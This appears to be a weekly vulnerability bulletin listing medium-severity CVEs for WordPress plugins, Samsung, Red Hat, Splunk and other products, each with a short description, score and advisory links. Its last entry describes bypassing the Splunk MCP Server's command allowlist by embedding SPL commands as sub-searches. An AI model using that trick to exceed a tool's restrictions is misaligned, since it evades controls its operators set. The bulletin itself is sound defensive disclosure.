| omnipressteam--Omnipress | The Omnipress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2025-12-05 | 6.4 | CVE-2025-12163 | https://www.wordfence.com/threat-intel/vulnerabilities/id/15aabe3b-1b77-4e4e-9710-cf06924dbcbf?source=cve https://plugins.trac.wordpress.org/browser/omnipress/tags/1.6.3/includes/RestApi/Controllers/V1/FileUploadRestController.php#L57 https://plugins.trac.wordpress.org/browser/omnipress/tags/1.6.3/includes/uploader/FileUploader.php#L85 https://plugins.trac.wordpress.org/browser/omnipress/tags/1.6.3/includes/uploader/FileUploader.php#L106 https://plugins.trac.wordpress.org/browser/omnipress/tags/1.6.3/includes/Core/RestControllersBase.php#L81 https://cwe.mitre.org/data/definitions/434.html https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload |
| opsre--go-ldap-admin | A vulnerability was determined in opsre go-ldap-admin up to 20251011. This issue affects some unknown processing of the file docs/docker-compose/docker-compose.yaml of the component JWT Handler. Executing manipulation of the argument secret key can lead to use of hard-coded cryptographic key . The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized. | 2025-12-03 | 5.6 | CVE-2025-13948 | VDB-334163 | opsre go-ldap-admin JWT docker-compose.yaml hard-coded key VDB-334163 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692213 | https://github.com/opsre https://github.com/opsre/go-ldap-admin Latest Authorization Bypass https://gist.github.com/H2u8s/a51ac1fe38d62746d1425b70ff49420c |
| optimizingmatters--Autoptimize | The Autoptimize plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the LCP Image to preload metabox in all versions up to, and including, 3.1.13 due to insufficient input sanitization and output escaping on user-supplied image attributes in the "create_img_preload_tag" function. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-03 | 6.4 | CVE-2025-13401 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6ed5bdb3-c4cd-4982-bc47-feeff527e284?source=cve https://plugins.trac.wordpress.org/changeset/3401333/autoptimize |
| orionsec--orion-ops | A vulnerability has been found in orionsec orion-ops up to 5925824997a3109651bbde07460958a7be249ed1. Affected by this issue is some unknown functionality of the file orion-ops-api/orion-ops-web/src/main/java/cn/orionsec/ops/controller/MachineInfoController.java of the component SSH Connection Handler. Such manipulation of the argument host/sshPort/username/password/authType leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. A patch should be applied to remediate this issue. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13809 | VDB-333819 | orionsec orion-ops SSH Connection MachineInfoController.java server-side request forgery VDB-333819 | CTI Indicators (IOB, IOC, IOA) Submit #692069 | orionsec (project owner of Orion-ops) Orion-ops (server component) <= master commit 5925824997a3109651bbde07460958a7be249ed1 Server-Side Request Forgery (SSRF) https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-ssrf-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-ssrf-1/report.md#proof-of-concept |
| orionsec--orion-ops | A vulnerability was detected in orionsec orion-ops up to 5925824997a3109651bbde07460958a7be249ed1. Affected is the function MachineKeyController of the file orion-ops-api/orion-ops-web/src/main/java/cn/orionsec/ops/controller/MachineKeyController.java of the component API. The manipulation results in improper authorization. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 4.3 | CVE-2025-13807 | VDB-333817 | orionsec orion-ops API MachineKeyController.java MachineKeyController improper authorization VDB-333817 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692066 | orionsec Orion-ops (server component) <= master commit 5925824997a3109651bbde07460958a7be249ed1 Improper Access Control / Information Disclosure (exposed machin https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-information-disclosure-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-information-disclosure-1/report.md#proof-of-concept |
| ovologics--PDF Catalog for WooCommerce | The PDF Catalog for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'pdfcatalog' AJAX action in all versions up to, and including, 1.1.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 5.4 | CVE-2025-12191 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cb5f5e33-e066-4a85-9367-4b8c2f948adf?source=cve https://wordpress.org/plugins/pdf-catalog-for-woocommerce/ |
| passionui--Listar Directory Listing & Classifieds WordPress Plugin | The Listar - Directory Listing & Classifieds WordPress Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the '/wp-json/listar/v1/place/delete' REST API endpoint in all versions up to, and including, 3.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts. | 2025-12-06 | 4.3 | CVE-2025-12574 | https://www.wordfence.com/threat-intel/vulnerabilities/id/33b98bee-7f33-4d49-96e1-9a1eafc92bb3?source=cve https://wordpress.org/plugins/listar-directory-listing/ |
| passionui--Listar Directory Listing & Classifieds WordPress Plugin | The Listar - Directory Listing & Classifieds WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/listar/v1/place/save' REST API endpoint in all versions up to, and including, 3.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update listing details. | 2025-12-06 | 4.3 | CVE-2025-12577 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a063fab3-6d52-4f2a-b51f-b76fa2d4711c?source=cve https://wordpress.org/plugins/listar-directory-listing/ |
| paulepro2019--EPROLO Dropshipping | The EPROLO Dropshipping plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wp_ajax_eprolo_delete_tracking and wp_ajax_eprolo_save_tracking_data AJAX endpoints in all versions up to, and including, 2.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify and delete tracking data. | 2025-12-05 | 4.3 | CVE-2025-12133 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a124da63-01a4-44d8-985b-cacef58ea9a3?source=cve https://wordpress.org/plugins/eprolo-dropshipping/ |
| PDF-XChange Co. Ltd--PDF-XChange Editor | An out-of-bounds read vulnerability exists in the EMF functionality of PDF-XChange Co. Ltd PDF-XChange Editor 10.7.3.401. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information. | 2025-12-02 | 6.5 | CVE-2025-58113 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2280 |
| phegman--Trail Manager | The Trail Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-05 | 4.4 | CVE-2025-13682 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eb43502e-dedd-46ff-b8e8-68298779f125?source=cve https://wordpress.org/plugins/trail-manager/ |
| pntrinh--TR Timthumb | The TR Timthumb plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcode attributes in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13899 | https://www.wordfence.com/threat-intel/vulnerabilities/id/675bf571-eb8b-4c72-9852-b3a2b37b9a04?source=cve https://plugins.trac.wordpress.org/browser/tr-timthumb/trunk/inc/front.php#L39 https://plugins.trac.wordpress.org/browser/tr-timthumb/tags/1.0.4/inc/front.php#L39 |
| posimyththemes--Nexter Extension Site Enhancements Toolkit | The Nexter Extension - Site Enhancements Toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'nxt-year' shortcode in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-02 | 6.4 | CVE-2025-13731 | https://www.wordfence.com/threat-intel/vulnerabilities/id/809cd97c-22ea-49e7-be46-688fefe50236?source=cve https://plugins.trac.wordpress.org/browser/nexter-extension/trunk/include/class-nexter-load-ext.php#L66 https://plugins.trac.wordpress.org/browser/nexter-extension/trunk/include/class-nexter-load-ext.php#L136 https://plugins.trac.wordpress.org/changeset?old=3402155&old_path=nexter-extension%2Ftags%2F4.4.1%2Finclude%2Fclass-nexter-load-ext.php&new=3403967&new_path=nexter-extension%2Ftags%2F4.4.2%2Finclude%2Fclass-nexter-load-ext.php |
| projectopia--Projectopia WordPress Project Management | The Projectopia - WordPress Project Management plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pto_delete_file AJAX action in all versions up to, and including, 5.1.19. This makes it possible for unauthenticated attackers to delete arbitrary attachments. | 2025-12-05 | 5.3 | CVE-2025-12876 | https://www.wordfence.com/threat-intel/vulnerabilities/id/940c6a27-05a2-4eca-89ee-b483f88b9524?source=cve https://plugins.trac.wordpress.org/browser/projectopia-core/trunk/includes/functions/general/general_functions.php#L389 |
| ProudMuBai--GoFilm | A vulnerability was identified in ProudMuBai GoFilm 1.0.0/1.0.1. Impacted is the function SingleUpload of the file /server/controller/FileController.go. The manipulation of the argument File leads to unrestricted upload. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-03 | 6.3 | CVE-2025-13949 | VDB-334164 | ProudMuBai GoFilm FileController.go SingleUpload unrestricted upload VDB-334164 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692774 | GoFilm 1.0.1 Unrestricted Upload https://github.com/yzlala1147/cve/issues/1 |
| Rareprob--HD Video Player All Formats App | A security vulnerability has been detected in Rareprob HD Video Player All Formats App 12.1.372 on Android. Impacted is an unknown function of the component com.rocks.music.videoplayer. The manipulation leads to path traversal. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-02 | 5.3 | CVE-2025-13876 | VDB-334032 | Rareprob HD Video Player All Formats App com.rocks.music.videoplayer path traversal VDB-334032 | CTI Indicators (IOB, IOC, TTP) Submit #692169 | RAREPROB SOLUTIONS PRIVATE LIMITED HD Video Player All Formats APP(com.rocks.music.videoplayer) V12.1.372 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/blob/main/HD%20Video%20Player%20All%20Formats/HD%20Video%20Player%20All%20Formats%20APP%20Arbitrary%20File%20Overwrite%20Vulnerability.md |
| Rarlab--RAR App | A security vulnerability has been detected in Rarlab RAR App up to 7.11 Build 127 on Android. This affects an unknown part of the component com.rarlab.rar. Such manipulation leads to path traversal. It is possible to launch the attack remotely. Attacks of this nature are highly complex. It is indicated that the exploitability is difficult. The exploit has been disclosed publicly and may be used. Upgrading to version 7.20 build 128 is able to mitigate this issue. You should upgrade the affected component. The vendor responded very professional: "This is the real vulnerability affecting RAR for Android only. WinRAR and Unix RAR versions are not affected. We already fixed it in RAR for Android 7.20 build 128 and we publicly mentioned it in that version changelog. (...) To avoid confusion among users, it would be useful if such disclosure emphasizes that it is RAR for Android only issue and WinRAR isn't affected." | 2025-12-05 | 5 | CVE-2025-14111 | VDB-334491 | Rarlab RAR App com.rarlab.rar path traversal VDB-334491 | CTI Indicators (IOB, IOC, TTP) Submit #697375 | Rarlab RAR APP(com.rarlab.rar) <=V7.11.build127 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/blob/main/com.rarlab.rar/RAR%20APP%20Arbitrary%20File%20Write%20and%20Read%20Vulnerability.md |
| realloc--myLCO | The myLCO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-06 | 6.1 | CVE-2025-13626 | https://www.wordfence.com/threat-intel/vulnerabilities/id/132efd40-1c90-4d2a-a87c-504526b7a7d4?source=cve https://wordpress.org/plugins/mylco https://plugins.trac.wordpress.org/browser/mylco/trunk/myLCO.php#L438 https://plugins.trac.wordpress.org/browser/mylco/tags/0.8.1/myLCO.php#L438 |
| realmag777--HUSKY Products Filter Professional for WooCommerce | The HUSKY - Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.7.2 via the "woof_add_query" and "woof_remove_query" functions due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber level access and above, to insert or remove arbitrary saved search queries into any user's profile, including administrators. | 2025-12-03 | 4.3 | CVE-2025-13109 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9effc186-c225-4b3b-9b8c-c453505a41de?source=cve https://plugins.trac.wordpress.org/changeset/3400527 |
| Red Hat--Red Hat Ceph Storage 5 | A flaw was found in ansible-collection-community-general. This vulnerability allows for information exposure (IE) of sensitive credentials, specifically plaintext passwords, via verbose output when running Ansible with debug modes. Attackers with access to logs could retrieve these secrets and potentially compromise Keycloak accounts or administrative access. | 2025-12-04 | 5.5 | CVE-2025-14010 | https://access.redhat.com/security/cve/CVE-2025-14010 RHBZ#2418774 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in util-linux. This vulnerability allows a heap buffer overread when processing 256-byte usernames, specifically within the `setpwnam()` function, affecting SUID (Set User ID) login-utils utilities writing to the password database. | 2025-12-05 | 6.1 | CVE-2025-14104 | https://access.redhat.com/security/cve/CVE-2025-14104 RHBZ#2419369 |
| Red Hat--Red Hat OpenShift Dev Spaces | A container privilege escalation flaw was found in certain CodeReady Workspaces images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container. | 2025-12-02 | 5.2 | CVE-2025-57850 | https://access.redhat.com/security/cve/CVE-2025-57850 RHBZ#2391103 |
| roselldk--WebP Express | The WebP Express plugin for WordPress is vulnerable to information exposure via config files in all versions up to, and including, 0.25.9. This is due to the plugin not properly randomizing the name of the config file to prevent direct access on NGINX. This makes it possible for unauthenticated attackers to extract configuration data. | 2025-12-04 | 5.3 | CVE-2025-11379 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c28479bf-768a-4ab4-8e74-ad367b9b744f?source=cve https://wordpress.org/plugins/webp-express/ |
| roxnor--ShopEngine Elementor WooCommerce Builder Addon All in One WooCommerce Solution | The ShopEngine Elementor WooCommerce Builder Addon plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.8.5. This is due to missing nonce validation on the "post_add_to_list" function as well as an incorrect permissions callback in the "Api/init" function. This makes it possible for unauthenticated attackers to add or remove products from a user's wishlist via a forged request granted they can trick a site's user into performing an action such as clicking on a link. | 2025-12-03 | 4.3 | CVE-2025-12358 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6ed605a1-9544-4b53-8d62-ad89214a4fb8?source=cve https://plugins.trac.wordpress.org/changeset/3401226/shopengine |
| roxnor--Wp Social Login and Register Social Counter | The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to missing authorization in versions up to, and including, 3.1.3. This is due to the REST routes wslu/v1/check_cache/{type}, wslu/v1/save_cache/{type}, and wslu/v1/settings/clear_counter_cache being registered with permission_callback set to __return_true and lacking capability or nonce validation in their handlers. This makes it possible for unauthenticated attackers to clear or overwrite the social counter cache via crafted REST requests. | 2025-12-05 | 5.3 | CVE-2025-13620 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4fa205d7-61ce-4ab9-b532-fd0b46b0f6a0?source=cve https://plugins.trac.wordpress.org/changeset/3402340/wp-social/tags/3.1.4/inc/admin-rest-api.php |
| saadiqbal--Post SMTP Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App | The Post SMTP plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.6.1. This is due to the plugin not properly verifying that a user is authorized to update OAuth tokens on the 'handle_gmail_oauth_redirect' function. This makes it possible for authenticated attackers, with subscriber level access and above, to inject invalid or attacker-controlled OAuth credentials. | 2025-12-03 | 5.4 | CVE-2025-12887 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5bd9f312-99e1-4dc2-855d-90339c2e24da?source=cve https://plugins.trac.wordpress.org/changeset/3402203 |
| Samsung Mobile--Galaxy Store for Galaxy Watch | Improper export of android application components in Galaxy Store for Galaxy Watch prior to version 1.0.06.29 allows local attacker to install arbitrary application on Galaxy Store. | 2025-12-02 | 5.9 | CVE-2025-58483 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Account | Improper input validation in Samsung Account prior to version 15.5.01.1 allows local attacker to execute arbitrary script. | 2025-12-02 | 4 | CVE-2025-58486 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Account | Improper authorization in Samsung Account prior to version 15.5.01.1 allows local attacker to launch arbitrary activity with Samsung Account privilege. | 2025-12-02 | 4 | CVE-2025-58487 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Cloud Assistant | Incorrect default permissions in Samsung Cloud Assistant prior to version 8.0.03.8 allows local attacker to access partial data in sandbox. | 2025-12-02 | 4 | CVE-2025-58484 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Internet | Improper input validation in Samsung Internet prior to version 29.0.0.48 allows local attackers to inject arbitrary script. | 2025-12-02 | 5.5 | CVE-2025-58485 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Improper export of android application components in Dynamic Lockscreen prior to SMR Dec-2025 Release 1 allows local attackers to access files with Dynamic Lockscreen's privilege. | 2025-12-02 | 6.2 | CVE-2025-21080 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds write in decoding metadata in fingerprint trustlet prior to SMR Dec-2025 Release 1 allows local privileged attackers to write out-of-bounds memory. | 2025-12-02 | 5.7 | CVE-2025-21072 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Improper input validation in libsec-ril.so prior to SMR Dec-2025 Release 1 allows local privileged attackers to write out-of-bounds memory. | 2025-12-02 | 5.6 | CVE-2025-58475 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds read vulnerability in bootloader prior to SMR Dec-2025 Release 1 allows physical attackers to access out-of-bounds memory. | 2025-12-02 | 4.2 | CVE-2025-58476 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds write in parsing IFD tag in libimagecodec.quram.so prior to SMR Dec-2025 Release 1 allows remote attackers to access out-of-bounds memory. | 2025-12-02 | 4.3 | CVE-2025-58477 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds write in libimagecodec.quram.so prior to SMR Dec-2025 Release 1 allows remote attackers to access out-of-bounds memory. | 2025-12-02 | 4.3 | CVE-2025-58478 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds read in libimagecodec.quram.so prior to SMR Dec-2025 Release 1 allows remote attackers to access out-of-bounds memory. | 2025-12-02 | 4.3 | CVE-2025-58479 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--Samsung Mobile Devices | Heap-based buffer overflow in libimagecodec.quram.so prior to SMR Dec-2025 Release 1 allows remote attackers to access out-of-bounds memory. | 2025-12-02 | 4.3 | CVE-2025-58480 | https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=12 |
| Samsung Mobile--SmartTouchCall | Improper verification of source of a communication channel in SmartTouchCall prior to version 1.0.1.1 allows remote attackers to access sensitive information. User interaction is required for triggering this vulnerability. | 2025-12-02 | 4.5 | CVE-2025-58488 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Seneka Software Hardware Information Technology Trade Contracting and Industry Ltd. Co.--Onaylarm | Improper Enforcement of Behavioral Workflow vulnerability in Seneka Software Hardware Information Technology Trade Contracting and Industry Ltd. Co. Onaylarım allows Functionality Misuse.This issue affects Onaylarım: from 25.09.26.01 through 18112025. | 2025-12-01 | 4.3 | CVE-2025-13129 | https://www.usom.gov.tr/bildirim/tr-25-0422 |
| SGAI--Space1 NAS N1211DS | A vulnerability was determined in SGAI Space1 NAS N1211DS up to 1.0.915. Impacted is the function RENAME_FILE/OPERATE_FILE/NGNIX_UPLOAD of the file /cgi-bin/JSONAPI of the component gsaiagent. This manipulation causes command injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 6.3 | CVE-2025-14184 | VDB-334604 | SGAI Space1 NAS N1211DS gsaiagent JSONAPI NGNIX_UPLOAD command injection VDB-334604 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698568 | SGAI N1211DS NAS v1.0.915 Command Injection Submit #698569 | SGAI N1211DS NAS v1.0.915 Command Injection (Duplicate) Submit #698570 | SGAI N1211DS NAS v1.0.915 Command Injection (Duplicate) https://www.notion.so/2b16cf4e528a80858abbf62b721a54b0 https://www.notion.so/2b16cf4e528a80f2ada9dc83651a4013 |
| SGAI--Space1 NAS N1211DS | A vulnerability was found in SGAI Space1 NAS N1211DS up to 1.0.915. This issue affects the function GET_FACTORY_INFO/GET_USER_INFO of the file /cgi-bin/JSONAPI of the component gsaiagent. The manipulation results in unprotected storage of credentials. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 4.3 | CVE-2025-14183 | VDB-334603 | SGAI Space1 NAS N1211DS gsaiagent JSONAPI GET_USER_INFO credentials storage VDB-334603 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698566 | SGAI N1211DS NAS v1.0.915 Improper Authentication Submit #698567 | SGAI N1211DS NAS v1.0.915 Improper Authentication (Duplicate) https://www.notion.so/2b16cf4e528a8000b30bd543247fa1bd https://www.notion.so/2b16cf4e528a80859264db63f2340d7a |
| siamlottery--Thai Lottery Widget | The Thai Lottery Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `thailottery` shortcode in all versions up to, and including, 2.5. This is due to insufficient input sanitization and output escaping on the user supplied `width` and `height` shortcode attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-13678 | https://www.wordfence.com/threat-intel/vulnerabilities/id/949eb9d6-0c8f-43f1-8580-998ea78c9549?source=cve https://plugins.trac.wordpress.org/browser/thai-lottery-widget/trunk/thailottery.php#L330 https://plugins.trac.wordpress.org/browser/thai-lottery-widget/tags/2.5/thailottery.php#L330 |
| smackcoders--Export All Posts, Products, Orders, Refunds & Users | The Export All Posts, Products, Orders, Refunds & Users plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.19. This is due to missing or incorrect nonce validation on the `parseData` function. This makes it possible for unauthenticated attackers to export sensitive information including user data, email addresses, password hashes, and WooCommerce data to an attacker-controlled file path on the server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-02 | 6.5 | CVE-2025-13606 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3511e110-d091-447d-87c0-25d33900bc30?source=cve https://plugins.trac.wordpress.org/changeset/3405694/ |
| smallstep--certificates | Step CA is an online certificate authority for secure, automated certificate management for DevOps. Prior to 0.29.0, there is an improper authorization check for SSH certificate revocation. This affects deployments configured with the SSHPOP provisioner. This vulnerability is fixed in 0.29.0. | 2025-12-03 | 5 | CVE-2025-66406 | https://github.com/smallstep/certificates/security/advisories/GHSA-j7c9-79x7-8hpr |
| Sobey--Media Convergence System | A vulnerability has been found in Sobey Media Convergence System 2.0/2.1. This vulnerability affects unknown code of the file /sobey-mchEditor/watermark/upload. The manipulation of the argument File leads to path traversal. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-07 | 6.3 | CVE-2025-14182 | VDB-334602 | Sobey Media Convergence System upload path traversal VDB-334602 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698561 | Chengdu Sobey Digital Technology Co., Ltd. Sobey Media Convergence System V2.0-2.1 Uploaded File https://github.com/hacker-routing/cve/issues/1 |
| Socomec--DIRIS Digiware M-70 | A cleartext transmission vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can sniff network traffic to trigger this vulnerability. | 2025-12-01 | 5.9 | CVE-2024-48894 | https://talosintelligence.com/vulnerability_reports/TALOS-2024-2115 https://www.socomec.fr/sites/default/files/2025-04/CVE-2024-48894---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-22-18_English_0.pdf |
| softdiscover--Zigaform Price Calculator & Cost Estimation Form Builder Lite | The Zigaform plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.6.5. This is due to the plugin exposing a public AJAX endpoint that retrieves form submission data without performing authorization checks to verify ownership or access rights. This makes it possible for unauthenticated attackers to extract sensitive form submission data including personal information, payment details, and other private data via the rocket_front_payment_seesummary action by enumerating sequential form_r_id values. | 2025-12-02 | 5.3 | CVE-2025-13696 | https://www.wordfence.com/threat-intel/vulnerabilities/id/47f9a466-2826-4835-b06e-14cf4ceb7567?source=cve https://plugins.trac.wordpress.org/browser/zigaform-calculator-cost-estimation-form-builder-lite/trunk/modules/formbuilder/controllers/uiform-fb-controller-frontend.php#L106 https://plugins.trac.wordpress.org/browser/zigaform-calculator-cost-estimation-form-builder-lite/tags/7.6.5/modules/formbuilder/controllers/uiform-fb-controller-frontend.php#L106 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406507%40zigaform-calculator-cost-estimation-form-builder-lite&new=3406507%40zigaform-calculator-cost-estimation-form-builder-lite&sfp_email=&sfph_mail= https://github.com/Softdiscover/Zigaform-WP-Cost-Estimator-Lite/commit/f129d8dd1fb3ab0535c7eb18d52fc49141ab36c8 |
| sozan45--Ultra Skype Button | The Ultra Skype Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'btn_id' parameter of the [ultra_skype] shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13898 | https://www.wordfence.com/threat-intel/vulnerabilities/id/20b3c88f-a0df-4814-83b6-27440c5ad38e?source=cve https://plugins.trac.wordpress.org/browser/ultra-skype-button/trunk/index.php#L39 https://plugins.trac.wordpress.org/browser/ultra-skype-button/tags/1.0/index.php#L39 https://plugins.trac.wordpress.org/browser/ultra-skype-button/trunk/index.php#L44 https://plugins.trac.wordpress.org/browser/ultra-skype-button/tags/1.0/index.php#L44 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.1, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.4, 10.0.2503.6, and 9.3.2411.117.125, an unauthenticated attacker can inject American National Standards Institute (ANSI) escape codes into Splunk log files due to improper validation at the /en-US/static/ web endpoint. This may allow them to poison, forge, or obfuscate sensitive log data through specially crafted HTTP requests, potentially impacting log integrity and detection capabilities. | 2025-12-03 | 5.3 | CVE-2025-20384 | https://advisory.splunk.com/advisories/SVD-2025-1203 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and below 3.9.10, 3.8.58, and 3.7.28 of Splunk Secure Gateway app in Splunk Cloud Platform, a low-privileged user that does not hold the "admin" or "power" Splunk roles and subscribes to mobile push notifications could receive notifications that disclose the title and description of the report or alert even if they do not have access to view the report or alert. | 2025-12-03 | 4.3 | CVE-2025-20383 | https://advisory.splunk.com/advisories/SVD-2025-1202 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and versions below 3.9.10, 3.8.58 and 3.7.28 of the Splunk Secure Gateway app on Splunk Cloud Platform, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious payload through the `label` column field after adding a new device in the Splunk Secure Gateway app. This could potentially lead to a client-side denial of service (DoS). | 2025-12-03 | 4.3 | CVE-2025-20389 | https://advisory.splunk.com/advisories/SVD-2025-1208 |
| Splunk--Splunk MCP Server | In Splunk MCP Server app versions below 0.2.4, a user with access to the "run_splunk_query" Model Context Protocol (MCP) tool could bypass the SPL command allowlist controls in MCP by embedding SPL commands as sub-searches, leading to unauthorized actions beyond the intended MCP restrictions. | 2025-12-03 | 5.4 | CVE-2025-20381 | https://advisory.splunk.com/advisories/SVD-2025-1210 |
